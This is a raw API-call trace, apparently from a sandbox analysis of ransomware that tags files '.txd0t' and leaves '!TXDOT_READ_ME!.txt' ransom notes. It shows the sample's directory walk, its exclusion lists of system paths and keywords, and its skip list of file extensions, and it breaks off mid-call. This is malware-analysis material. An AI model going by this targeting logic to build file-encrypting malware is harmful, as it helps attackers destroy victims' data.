StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\boot\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\perflogs\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\programdata\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\drivers\\") returned 0x0 [0128.574] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\wsus\\") returned 0x0 [0128.575] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.575] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.575] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="crypt_detect") returned 0x0 [0128.575] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="cryptolocker") returned 0x0 [0128.575] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="ransomware") returned 0x0 [0128.575] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\WINDOWS") returned 0x0 [0128.575] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.575] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1032", lpSrch="C:\\Program Files") returned 0x0 [0128.575] GetProcessHeap () returned 0xe30000 [0128.575] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.575] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0128.575] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\*") returned="C:\\588bce7c90097ed212\\1032\\*" [0128.575] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x582d8947, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.575] StrCmpW (psz1=".", psz2=".") returned 0 [0128.575] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x582d8947, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.575] StrCmpW (psz1="..", psz2=".") returned 1 [0128.575] StrCmpW (psz1="..", psz2="..") returned 0 [0128.575] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5818147a, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5818147a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5818147a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.575] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.575] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.575] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0128.575] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0128.575] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1032\\!TXDOT_READ_ME!.txt" [0128.575] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.575] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.575] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.575] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.575] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.575] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.576] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5815b20e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x24ac, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.576] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.576] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.576] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0128.576] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0128.576] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1032\\eula.rtf.txd0t" [0128.576] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.576] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.576] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x582d8947, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1530c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.576] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.576] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.576] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0128.576] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0128.576] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.txd0t" [0128.576] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.576] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.576] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.576] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.576] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.576] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1032", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032") returned="C:\\588bce7c90097ed212\\1032" [0128.576] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\") returned="C:\\588bce7c90097ed212\\1032\\" [0128.576] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1032\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" [0128.576] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.576] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.576] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.577] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.577] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.577] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.577] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.577] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.577] GetProcessHeap () returned 0xe30000 [0128.577] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.577] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58324e32, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0128.577] StrCmpW (psz1="1033", psz2=".") returned 1 [0128.577] StrCmpW (psz1="1033", psz2="..") returned 1 [0128.577] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.577] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.577] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1033", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0128.577] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\system32\\") returned 0x0 [0128.577] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.577] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\system\\") returned 0x0 [0128.577] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.577] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.577] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\local\\") returned 0x0 [0128.577] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.577] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\boot\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\perflogs\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\programdata\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\drivers\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\wsus\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="crypt_detect") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="cryptolocker") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="ransomware") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\WINDOWS") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\Program Files") returned 0x0 [0128.578] GetProcessHeap () returned 0xe30000 [0128.578] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.578] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0128.578] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\*") returned="C:\\588bce7c90097ed212\\1033\\*" [0128.578] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58324e32, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.578] StrCmpW (psz1=".", psz2=".") returned 0 [0128.578] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58324e32, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.578] StrCmpW (psz1="..", psz2=".") returned 1 [0128.578] StrCmpW (psz1="..", psz2="..") returned 0 [0128.578] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581a7728, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x581a7728, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x581a7728, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.578] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.578] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.578] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0128.578] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0128.578] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1033\\!TXDOT_READ_ME!.txt" [0128.579] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.579] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.579] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0x581a7728, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe74, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.579] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.579] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.579] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0128.579] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0128.579] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1033\\eula.rtf.txd0t" [0128.579] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.579] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.579] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12fb0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.579] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.579] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.579] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0128.579] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0128.579] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.txd0t" [0128.579] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.579] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.579] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.579] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.579] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.580] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0128.580] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0128.580] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" [0128.580] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.580] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.580] StrCmpIW (psz1="SetupResources.dll", 